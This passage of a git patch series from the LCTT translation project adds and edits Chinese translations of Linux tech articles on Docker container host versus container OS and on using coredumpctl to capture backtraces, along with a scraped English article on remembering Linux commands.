每个容器使用 Hyper-V 虚拟机内的内核,它在容器之间提供额外的分离层。 + +* 所有 Windows 容器都需要 [nanoserver][5] 或 [windowsservercore][6] 的基础操作系统。 + +几个好的链接: + +* [关于 Windows 容器][7] + +* [深入实现 Windows 容器,包括多用户模式和“写时复制”来节省资源][8] + +* [Linux 容器如何通过使用“写时复制”来节省资源][9] + +-------------------------------------------------------------------------------- + +via: http://floydhilton.com/docker/2017/03/31/Docker-ContainerHost-vs-ContainerOS-Linux-Windows.html + +作者:[Floyd Hilton ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://floydhilton.com/about/ +[1]:https://hub.docker.com/_/scratch/ +[2]:https://www.brianchristner.io/docker-image-base-os-size-comparison/ +[3]:https://hub.docker.com/r/microsoft/nanoserver/ +[4]:https://hub.docker.com/r/microsoft/windowsservercore/ +[5]:https://hub.docker.com/r/microsoft/nanoserver/ +[6]:https://hub.docker.com/r/microsoft/windowsservercore/ +[7]:https://docs.microsoft.com/en-us/virtualization/windowscontainers/about/ +[8]:http://blog.xebia.com/deep-dive-into-windows-server-containers-and-docker-part-2-underlying-implementation-of-windows-server-containers/ +[9]:https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/#the-copy-on-write-strategy From 0ed8ec088bc2f420e03a26632377476e4f11c321 Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Mon, 27 Nov 2017 21:23:19 +0800 Subject: [PATCH 0015/1627] Update 20161216 Kprobes Event Tracing on ARMv8.md 1st translate by kimii --- sources/tech/20161216 Kprobes Event Tracing on ARMv8.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md b/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md index b0528ed2b1..e27290531c 100644 --- a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -1,3 +1,4 @@ +Translating by kimii # Kprobes Event Tracing on ARMv8 ![core-dump](http://www.linaro.org/wp-content/uploads/2016/02/core-dump.png) From 56b7b472700b63d2dc7a8384b659ee4cb77ac579 Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Mon, 27 Nov 2017 21:23:24 +0800 Subject: [PATCH 0016/1627] Update 20161216 Kprobes Event Tracing on ARMv8.md 1st translate by kimii --- sources/tech/20161216 Kprobes Event Tracing on ARMv8.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md b/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md index b0528ed2b1..e27290531c 100644 --- a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -1,3 +1,4 @@ +Translating by kimii # Kprobes Event Tracing on ARMv8 ![core-dump](http://www.linaro.org/wp-content/uploads/2016/02/core-dump.png) From 89173b5b087800a288d78f538b4c9213114ee92c Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 27 Nov 2017 22:26:31 +0800 Subject: [PATCH 0017/1627] =?UTF-8?q?=E8=B6=85=E6=9C=9F=E5=9B=9E=E6=94=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @rieonke @penghuster @hwlife @syys96 @firmianay @sugarfillet @2ephaniah @XYenChi 如果你还在继续进行,请再领回去~ --- ...ning System Services in Red Hat Enterprise Linux – Part 1.md | 1 - ...170809 Designing a Microservices Architecture for Failure.md | 2 -- sources/tech/20170908 Betting on the Web.md | 1 - ...all Software from Source Code... and Remove it Afterwards.md | 1 - .../20171009 Examining network connections on Linux systems.md | 2 -- ...12 Linux Networking Hardware for Beginners Think Software.md | 1 - sources/tech/20171014 Proxy Models in Container Environments.md | 2 -- sources/tech/20171017 Image Processing on Linux.md | 1 - 8 files changed, 11 deletions(-) diff --git a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md b/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md index 2410f2dcad..6f6c6fd16e 100644 --- a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md +++ b/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md @@ -1,4 +1,3 @@ -> translating by rieonke Containing System Services in Red Hat Enterprise Linux – Part 1 ============================================================ diff --git a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md index 3e53413b8b..e1124c229c 100644 --- a/sources/tech/20170809 Designing a Microservices Architecture for Failure.md +++ b/sources/tech/20170809 Designing a Microservices Architecture for Failure.md @@ -1,5 +1,3 @@ -translating by penghuster - Designing a Microservices Architecture for Failure ============================================================  diff --git a/sources/tech/20170908 Betting on the Web.md b/sources/tech/20170908 Betting on the Web.md index 5a5746e681..84d70e164f 100644 --- a/sources/tech/20170908 Betting on the Web.md +++ b/sources/tech/20170908 Betting on the Web.md @@ -1,4 +1,3 @@ -translate by hwlife [Betting on the Web][27] ============================================================ diff --git a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md index eb4a201931..5f61ca124a 100644 --- a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md +++ b/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md @@ -1,4 +1,3 @@ -"Translating by syys96" How to Install Software from Source Code… and Remove it Afterwards ============================================================ diff --git a/sources/tech/20171009 Examining network connections on Linux systems.md b/sources/tech/20171009 Examining network connections on Linux systems.md index 665e1e546d..299aef18e2 100644 --- a/sources/tech/20171009 Examining network connections on Linux systems.md +++ b/sources/tech/20171009 Examining network connections on Linux systems.md @@ -1,5 +1,3 @@ -translating by firmianay - Examining network connections on Linux systems ============================================================ diff --git a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md index 5f1d67a9c8..1411c0eb87 100644 --- a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md @@ -1,4 +1,3 @@ -translating by sugarfillet Linux Networking Hardware for Beginners: Think Software ============================================================ diff --git a/sources/tech/20171014 Proxy Models in Container Environments.md b/sources/tech/20171014 Proxy Models in Container Environments.md index 74ab1993e5..51d84f4985 100644 --- a/sources/tech/20171014 Proxy Models in Container Environments.md +++ b/sources/tech/20171014 Proxy Models in Container Environments.md @@ -1,5 +1,3 @@ -translating by 2ephaniah - Proxy Models in Container Environments ============================================================ diff --git a/sources/tech/20171017 Image Processing on Linux.md b/sources/tech/20171017 Image Processing on Linux.md index 77c1ab2caa..605ba7c995 100644 --- a/sources/tech/20171017 Image Processing on Linux.md +++ b/sources/tech/20171017 Image Processing on Linux.md @@ -1,4 +1,3 @@ -XYenChi is translating Image Processing on Linux ============================================================ From 075d02a992aecbcbf1882cda99119149e4a7f811 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 27 Nov 2017 23:00:44 +0800 Subject: [PATCH 0018/1627] PRF&PUB:20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md @geekpi --- ...ner OS for Linux and Windows Containers.md | 45 +++++++------------ 1 file changed, 15 insertions(+), 30 deletions(-) rename {translated/tech => published}/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md (63%) diff --git a/translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md similarity index 63% rename from translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md rename to published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md index 2fcd02694d..66a57da3e9 100644 --- a/translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md +++ b/published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md @@ -1,72 +1,57 @@ -# 了解用于 Linux 和 Windows 容器的 Docker “容器主机”与“容器操作系统” - - +了解用于 Linux 和 Windows 容器的 Docker “容器主机”与“容器操作系统” +================= 让我们来探讨一下“容器主机”和“容器操作系统”之间的关系,以及它们在 Linux 和 Windows 容器之间的区别。 -#### 一些定义: +### 一些定义 -* 容器主机:也称为主机操作系统。主机操作系统是 Docker 客户端和 Docker 守护程序在其上运行的操作系统。在 Linux 和非 Hyper-V 容器的情况下,主机操作系统与运行中的 Docker 容器共享 内核。对于 Hyper-V,每个容器都有自己的 Hyper-V 内核。 +* 容器主机Container Host:也称为主机操作系统Host OS。主机操作系统是 Docker 客户端和 Docker 守护程序在其上运行的操作系统。在 Linux 和非 Hyper-V 容器的情况下,主机操作系统与运行中的 Docker 容器共享内核。对于 Hyper-V,每个容器都有自己的 Hyper-V 内核。 +* 容器操作系统Container OS:也被称为基础操作系统Base OS。基础操作系统是指包含操作系统如 Ubuntu、CentOS 或 windowsservercore 的镜像。通常情况下,你将在基础操作系统镜像之上构建自己的镜像,以便可以利用该操作系统的部分功能。请注意,Windows 容器需要一个基础操作系统,而 Linux 容器不需要。 +* 操作系统内核Operating System Kernel:内核管理诸如内存、文件系统、网络和进程调度等底层功能。 -* 容器操作系统:也被称为基础操作系统。基础操作系统是指包含操作系统如 Ubuntu、CentOS 或 windowsservercore 的镜像。通常情况下,你将在基础操作系统镜像之上构建自己的镜像,以便可以利用部分操作系统。请注意,Windows 容器需要一个基础操作系统,而 Linux 容器不需要。 - -* 操作系统内核:内核管理诸如内存、文件系统、网络和进程调度等底层功能。 - -#### 这有些图片: +### 如下的一些图 ![Linux Containers](http://floydhilton.com/images/2017/03/2017-03-31_14_50_13-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) -在上面的例子中 - -* 主机操作系统是Ubuntu。 +在上面的例子中: +* 主机操作系统是 Ubuntu。 * Docker 客户端和 Docker 守护进程(一起被称为 Docker 引擎)正在主机操作系统上运行。 - * 每个容器共享主机操作系统内核。 - * CentOS 和 BusyBox 是 Linux 基础操作系统镜像。 - -“No OS” 容器表明你不需要基础操作系统以在 Linux 中运行一个容器。你可以创建一个含有 [scratch][1] 基础镜像的 Docker 文件,然后运行直接使用内核的二进制文件。 - +* “No OS” 容器表明你不需要基础操作系统以在 Linux 中运行一个容器。你可以创建一个含有 [scratch][1] 基础镜像的 Docker 文件,然后运行直接使用内核的二进制文件。 * 查看[这篇][2]文章来比较基础 OS 的大小。 ![Windows Containers - Non Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_04_03-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) -在上面的例子中 +在上面的例子中: * 主机操作系统是 Windows 10 或 Windows Server。 - * 每个容器共享主机操作系统内核。 - * 所有 Windows 容器都需要 [nanoserver][3] 或 [windowsservercore][4] 的基础操作系统。 ![Windows Containers - Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_41_31-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) -在上面的例子中 +在上面的例子中: * 主机操作系统是 Windows 10 或 Windows Server。 - * 每个容器都托管在自己的轻量级 Hyper-V 虚拟机中。 - * 每个容器使用 Hyper-V 虚拟机内的内核,它在容器之间提供额外的分离层。 - * 所有 Windows 容器都需要 [nanoserver][5] 或 [windowsservercore][6] 的基础操作系统。 -几个好的链接: +### 几个好的链接 * [关于 Windows 容器][7] - * [深入实现 Windows 容器,包括多用户模式和“写时复制”来节省资源][8] - * [Linux 容器如何通过使用“写时复制”来节省资源][9] -------------------------------------------------------------------------------- via: http://floydhilton.com/docker/2017/03/31/Docker-ContainerHost-vs-ContainerOS-Linux-Windows.html -作者:[Floyd Hilton ][a] +作者:[Floyd Hilton][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From e3fa42c518162de92a39f28bdde9f385d1a120f0 Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 28 Nov 2017 09:09:23 +0800 Subject: [PATCH 0019/1627] translated --- ...71110 File better bugs with coredumpctl.md | 99 ------------------- ...71110 File better bugs with coredumpctl.md | 97 ++++++++++++++++++ 2 files changed, 97 insertions(+), 99 deletions(-) delete mode 100644 sources/tech/20171110 File better bugs with coredumpctl.md create mode 100644 translated/tech/20171110 File better bugs with coredumpctl.md diff --git a/sources/tech/20171110 File better bugs with coredumpctl.md b/sources/tech/20171110 File better bugs with coredumpctl.md deleted file mode 100644 index 95846965bf..0000000000 --- a/sources/tech/20171110 File better bugs with coredumpctl.md +++ /dev/null @@ -1,99 +0,0 @@ -translating----geekpi - -# [File better bugs with coredumpctl][1] - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/coredump.png-945x400.jpg) - -An unfortunate fact of life is that all software has bugs, and some bugs can make the system crash. When it does, it often leaves a data file called a  _core dump_  on disk. This file contains data about your system when it crashed, and may help determine why the crash occurred. Often developers request data in the form of a  _backtrace_ , showing the flow of instructions that led to the crash. The developer can use it to fix the bug and improve the system. Here’s how to easily generate a backtrace if you have a system crash. - -### Getting started with coredumpctl - -Most Fedora systems use the [Automatic Bug Reporting Tool (ABRT)][2] to automatically capture dumps and file bugs for crashes. However, if you have disabled this service or removed the package, this method may be helpful. - -If you experience a system crash, first ensure that you’re running the latest updated software. Updates often contain fixes that have already been found to fix a bug that causes critical errors and crashes. Once you update, try to recreate the situation that led to the bug. - -If the crash still happens, or if you’re already running the latest software, it’s time to use the helpful  _coredumpctl_  utility. This utility helps locate and process crashes. To see a list of all core dumps on your system, run this command: - -``` -coredumpctl list -``` - -Don’t be surprised if you see a longer list than expected. Sometimes system components crash silently behind the scenes, and recover on their own. An easy way to quickly find a dump from today is to use the  _–since_  option: - -``` -coredumpctl list --since=today -``` - -The  _PID_  column contains the process ID used to identify the dump. Note that number, since you’ll use it again along the way. Or, if you don’t want to remember it, assign it to a variable you can use in the rest of the commands below: - -``` -MYPID= -``` - -To see information about the core dump, use this command (either use the  _$MYPID_  variable, or substitute the PID number): - -``` -coredumpctl info $MYPID -``` - -### Install debuginfo packages - -Debugging symbols translate between data in the core dump and the instructions found in original source code. This symbol data can be quite large. Therefore, symbols are shipped in  _debuginfo_  packages separately from the packages most users run on Fedora systems. To determine which debuginfo packages you must install, start by running this command: - -``` -coredumpctl gdb $MYPID -``` - -This may result in a large amount of information to the screen. The last line may tell you to use  _dnf_  to install more debuginfo packages. Run that command [with sudo][3] to continue: - -``` -sudo dnf debuginfo-install  -``` - -Then try the  _coredumpctl gdb $MYPID_  command again. **You may need to do this repeatedly,** as other symbols are unwound in the trace. - -### Capturing the backtrace - -Run the following commands to log information in the debugger: - -``` -set logging file mybacktrace.txt -set logging on -``` - -You may find it helpful to turn off the pagination. For long backtraces this saves time. - -``` -set pagination off -``` - -Now run the backtrace: - -``` -thread apply all bt full -``` - -Now you can type  _quit_  to quit the debugger. The  _mybacktrace.txt_  file includes backtrace information you can attach to a bug or issue. Or if you’re working with someone in real time, you can upload the text to a pastebin. Either way, you can now provide more assistance to the developer to fix the problem. - ---------------------------------- - -作者简介: - -Paul W. Frields - -Paul W. Frields has been a Linux user and enthusiast since 1997, and joined the Fedora Project in 2003, shortly after launch. He was a founding member of the Fedora Project Board, and has worked on documentation, website publishing, advocacy, toolchain development, and maintaining software. He joined Red Hat as Fedora Project Leader from February 2008 to July 2010, and remains with Red Hat as an engineering manager. He currently lives with his wife and two children in Virginia. - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/file-better-bugs-coredumpctl/ - -作者:[Paul W. Frields ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://fedoramagazine.org/author/pfrields/ -[1]:https://fedoramagazine.org/file-better-bugs-coredumpctl/ -[2]:https://github.com/abrt/abrt -[3]:https://fedoramagazine.org/howto-use-sudo/ diff --git a/translated/tech/20171110 File better bugs with coredumpctl.md b/translated/tech/20171110 File better bugs with coredumpctl.md new file mode 100644 index 0000000000..06d7d700f7 --- /dev/null +++ b/translated/tech/20171110 File better bugs with coredumpctl.md @@ -0,0 +1,97 @@ +# [用 coredumpctl 更好地记录 bug][1] + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/coredump.png-945x400.jpg) + +一个不幸的事实是,所有的软件都有 bug,一些 bug 会导致系统崩溃。当它出现的时候,它经常会在磁盘上留下一个名为 _core dump_ 的数据文件。该文件包含有关系统崩溃时的相关数据,可能有助于确定发生崩溃的原因。通常开发者要求有显示导致崩溃的指令流的 _backtrace_ 形式的数据。开发人员可以使用它来修复 bug 并改进系统。如果系统崩溃,以下是如何轻松生成 backtrace 的方法。 + +### 开始使用 coredumpctl + +大多数 Fedora 系统使用[自动错误报告工具 (ABRT)][2]来自动捕获崩溃文件并记录 bug。但是,如果你禁用了此服务或删除了该软件包,则此方法可能会有所帮助。 + +如果你遇到系统崩溃,请首先确保你运行的是最新的软件。更新通常包含修复程序,这些更新通常含有已经发现的会导致严重错误和崩溃的错误的修复。当你更新后,请尝试重新创建导致错误的情况。 + +如果崩溃仍然发生,或者你已经在运行最新的软件,那么可以使用有用的 _coredumpctl_。此程序可帮助查找和处理崩溃。要查看系统上所有核心转储列表,请运行以下命令: + +``` +coredumpctl list +``` + +如果你看到比预期长的列表,请不要感到惊讶。有时系统组件在后台默默地崩溃,并自行恢复。现在快速查找转储的简单方法是使用 _-since_ 选项: + +``` +coredumpctl list --since=today +``` + +_PID_ 列包含用于标识转储的进程 ID。请注意这个数字,因为你会之后再用到它。或者,如果你不想记住它,使用下面的命令将它赋值给一个变量: + +``` +MYPID= +``` + +要查看关于核心转储的信息,请使用此命令(使用 _$MYPID_ 变量或替换 PID 编号): + +``` +coredumpctl info $MYPID +``` + +### 安装 debuginfo 包 + +在核心转储中的数据以及原始代码中的指令之间调试符号转义。这个符号数据可能相当大。因此,符号以 _debuginfo_ 软件包的形式与大多数用户使用的 Fedora 系统分开安装。要确定你必须安装哪些 debuginfo 包,请先运行以下命令: + +``` +coredumpctl gdb $MYPID +``` + +这可能会在屏幕上显示大量信息。最后一行可能会告诉你使用 _dnf_ 安装更多的 debuginfo 软件包。[用 sudo ][3]运行该命令: + +``` +sudo dnf debuginfo-install  +``` + +然后再次尝试 _coredumpctl gdb $MYPID_ 命令。**你可能需要重复执行此操作**,因为其他符号会在 trace 中展开。 + +### 捕获 backtrace + +运行以下命令以在调试器中记录信息: + +``` +set logging file mybacktrace.txt +set logging on +``` + +你可能会发现关闭分页有帮助。对于长的 backtrace,这可以节省时间。 + +``` +set pagination off +``` + +现在运行 backtrace: + +``` +thread apply all bt full +``` + +现在你可以输入 _quit_ 来退出调试器。_mybacktrace.txt_ 包含可附加到 bug 或问题的追踪信息。或者,如果你正在与某人实时合作,则可以将文本上传到 pastebin。无论哪种方式,你现在可以向开发人员提供更多的帮助来解决问题。 + +--------------------------------- + +作者简介: + +Paul W. Frields + +Paul W. Frields 自 1997 年以来一直是 Linux 用户和爱好者,并于 2003 年在 Fedora 发布不久后加入 Fedora。他是 Fedora 项目委员会的创始成员之一,从事文档、网站发布、宣传、工具链开发和维护软件。他于 2008 年 2 月至 2010 年 7 月加入 Red Hat,担任 Fedora 项目负责人,现任红帽公司工程部经理。他目前和妻子和两个孩子住在弗吉尼亚州。 + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/file-better-bugs-coredumpctl/ + +作者:[Paul W. Frields ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/pfrields/ +[1]:https://fedoramagazine.org/file-better-bugs-coredumpctl/ +[2]:https://github.com/abrt/abrt +[3]:https://fedoramagazine.org/howto-use-sudo/ From daa067694fc97c67869dfcf2bba33b93a57c0b3b Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 28 Nov 2017 09:13:24 +0800 Subject: [PATCH 0020/1627] translating --- .../20171009 Examining network connections on Linux systems.md | 2 ++ sources/tech/20171014 Proxy Models in Container Environments.md | 2 ++ 2 files changed, 4 insertions(+) diff --git a/sources/tech/20171009 Examining network connections on Linux systems.md b/sources/tech/20171009 Examining network connections on Linux systems.md index 299aef18e2..3cfb68db88 100644 --- a/sources/tech/20171009 Examining network connections on Linux systems.md +++ b/sources/tech/20171009 Examining network connections on Linux systems.md @@ -1,3 +1,5 @@ +translating---geekpi + Examining network connections on Linux systems ============================================================ diff --git a/sources/tech/20171014 Proxy Models in Container Environments.md b/sources/tech/20171014 Proxy Models in Container Environments.md index 51d84f4985..78649f1077 100644 --- a/sources/tech/20171014 Proxy Models in Container Environments.md +++ b/sources/tech/20171014 Proxy Models in Container Environments.md @@ -1,3 +1,5 @@ +translating---geekpi + Proxy Models in Container Environments ============================================================ From 723217c9da676fa48ef787bec9933bd5acc4057b Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 28 Nov 2017 11:57:44 +0800 Subject: [PATCH 0021/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Easi?= =?UTF-8?q?ly=20Remember=20Linux=20Commands?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...7 How to Easily Remember Linux Commands.md | 604 ++++++++++++++++++ 1 file changed, 604 insertions(+) create mode 100644 sources/tech/20171117 How to Easily Remember Linux Commands.md diff --git a/sources/tech/20171117 How to Easily Remember Linux Commands.md b/sources/tech/20171117 How to Easily Remember Linux Commands.md new file mode 100644 index 0000000000..718ad5dea0 --- /dev/null +++ b/sources/tech/20171117 How to Easily Remember Linux Commands.md @@ -0,0 +1,604 @@ +Skip to content + +[ ![Make Tech +Easier](https://www.maketecheasier.com/assets/themes/MTE-10/images/mtelogo.svg) +](https://www.maketecheasier.com/remember-linux- +commands/) + + * [__](https://www.maketecheasier.com/remember-linux-commands/) + +Search __ + + * Sign In + +My Favorites + +Sign up or login to view your favorites! + +Log in + +[Forgot your password?](https://www.maketecheasier.com/remember-linux- +commands/) + +Sign up to comment and more Sign up + + * [How-To ](https://www.maketecheasier.com/remember-linux-commands/) + + * Categories + * [ __Windows](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Linux](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Mac](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Mobile](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Android](https://www.maketecheasier.com/remember-linux-commands/) + * [ __iOS](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Web](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Browsers](https://www.maketecheasier.com/remember-linux-commands/) + * [ __WordPress](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Gadgets](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Hardware Guides](https://www.maketecheasier.com/remember-linux-commands/) + * [ __How Things Work](https://www.maketecheasier.com/remember-linux-commands/) + * [ __All Categories](https://www.maketecheasier.com/remember-linux-commands/) + + * Series + * [Understanding Android ROM](https://www.maketecheasier.com/remember-linux-commands/) + * [Apache Server Guide](https://www.maketecheasier.com/remember-linux-commands/) + * [Hardware Buying Guide](https://www.maketecheasier.com/remember-linux-commands/) + * [iOS Beginner Guide](https://www.maketecheasier.com/remember-linux-commands/) + * [Windows Alternative Apps](https://www.maketecheasier.com/remember-linux-commands/) + * [Linux Desktop Themes](https://www.maketecheasier.com/remember-linux-commands/) + * [Mastering WordPress](https://www.maketecheasier.com/remember-linux-commands/) + * [Mastering RAID](https://www.maketecheasier.com/remember-linux-commands/) + * [ All Series](https://www.maketecheasier.com/remember-linux-commands/) + + * [Software](https://www.maketecheasier.com/remember-linux-commands/) + * [ebooks](https://www.maketecheasier.com/remember-linux-commands/) + * [Deals](https://www.maketecheasier.com/remember-linux-commands/) + * [Giveaway](https://www.maketecheasier.com/remember-linux-commands/) + * More + + * About Us + * [About Us](https://www.maketecheasier.com/remember-linux-commands/) + * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) + * [Contact Us](https://www.maketecheasier.com/remember-linux-commands/) + * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) + * [Advertise with us](https://www.maketecheasier.com/remember-linux-commands/) + * [Terms of Service](https://www.maketecheasier.com/remember-linux-commands/) + + * Follow Us + * [ __RSS](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Facebook](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Twitter](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Google+](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Instagram](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Pinterest](https://www.maketecheasier.com/remember-linux-commands/) + * [ __Youtube](https://www.maketecheasier.com/remember-linux-commands/) + +__ + +__Hi there, +Log in | Sign up + + * Section + * [Windows](https://www.maketecheasier.com/remember-linux-commands/) + * [Linux](https://www.maketecheasier.com/remember-linux-commands/) + * [Mac](https://www.maketecheasier.com/remember-linux-commands/) + * [Mobile](https://www.maketecheasier.com/remember-linux-commands/) + * [Android](https://www.maketecheasier.com/remember-linux-commands/) + * [iOS](https://www.maketecheasier.com/remember-linux-commands/) + * [Internet](https://www.maketecheasier.com/remember-linux-commands/) + * [Browsers](https://www.maketecheasier.com/remember-linux-commands/) + * [WordPress](https://www.maketecheasier.com/remember-linux-commands/) + * [Gadgets](https://www.maketecheasier.com/remember-linux-commands/) + * [Hardware Guides](https://www.maketecheasier.com/remember-linux-commands/) + * [How Things Work](https://www.maketecheasier.com/remember-linux-commands/) + * [All Categories](https://www.maketecheasier.com/remember-linux-commands/) + + * Sites + * [MTE Premium](https://www.maketecheasier.com/remember-linux-commands/) + * [Software Discovery](https://www.maketecheasier.com/remember-linux-commands/) + * [Ebooks](https://www.maketecheasier.com/remember-linux-commands/) + * [Deals](https://www.maketecheasier.com/remember-linux-commands/) + * About Us + * [About Us](https://www.maketecheasier.com/remember-linux-commands/) + * [Advertise with us](https://www.maketecheasier.com/remember-linux-commands/) + * [Contact Us](https://www.maketecheasier.com/remember-linux-commands/) + * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) + * [Terms of Service](https://www.maketecheasier.com/remember-linux-commands/) + * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) + + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + * [ __](https://www.maketecheasier.com/remember-linux-commands/) + +# How to Easily Remember Linux Commands + +![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) + +__[ Nick Congleton](https://www.maketecheasier.com/remember-linux- +commands/) __17th Nov +2017 __[Linux](https://www.maketecheasier.com/remember-linux- +commands/) __ [9 +Comments](https://www.maketecheasier.com/remember-linux- +commands/) + + * [__Share](https://www.maketecheasier.com/remember-linux-commands/ "Share this article in Facebook") + * [__Tweet](https://www.maketecheasier.com/remember-linux-commands/ "Share this article in Twitter") + * [__Email](https://www.maketecheasier.com/remember-linux-commands/ "Email this article to your friends") + + * __ + * [__](https://www.maketecheasier.com/remember-linux-commands/ "Previous article: Lifetime Access to Microsoft Office Mastery Bundle for Only $49") + * [__](https://www.maketecheasier.com/remember-linux-commands/ "Next article: How to Automatically Disable WiFi When Connected to a Wired Connection") + +The command line can be daunting for new Linux users. Part of that is +remembering the multitude of commands available. After all, in order to use +the command line effectively, you need to know the commands. + +Unfortunately, there's no getting around the fact that you need to learn the +commands, but there are some tools that can help you out when you're getting +started. + +## History + +![Linux Bash History +Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash- +history.jpg)![Linux Bash History +Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash- +history.jpg) + +The first thing you can use to remember commands that you've already used is +your own command line history. Most [Linux +shells](https://www.maketecheasier.com/remember-linux- +commands/), including +the most common default, Bash, create a history file that lists your past +commands. For Bash, you can find it at "/home//.bash_history." + +It's a plain text file, so you can open it in any text editor and loop back +through or even search. + +## Apropos + +There's actually a command that helps you find _other_ commands. It 's called +"apropos," and it helps you find the appropriate command to complete the +action you search or. For example, if you need to know the command to list the +contents of a directory, you can run the following command: + +[code] + + apropos "list directory" +[/code] + +![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc- +apropos.jpg)![Linux +Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) + +There's a catch, though. It's very literal. Add an "s" to "directory," and try +again. + +[code] + + apropos "list directories" +[/code] + +It doesn't work. What `apropos` does is search through a list of commands and +the accompanying descriptions. If your search doesn't match the description, +it won't pick up the command as a result. + +There is something else you can do. By using the `-a` flag, you can add +together search terms in a more flexible way. Try this command: + +[code] + + apropos "match pattern" +[/code] + +![Linux Apropos -a +Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc- +apropos-a.jpg)![Linux Apropos -a +Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) + +You'd think it'd turn up something, like 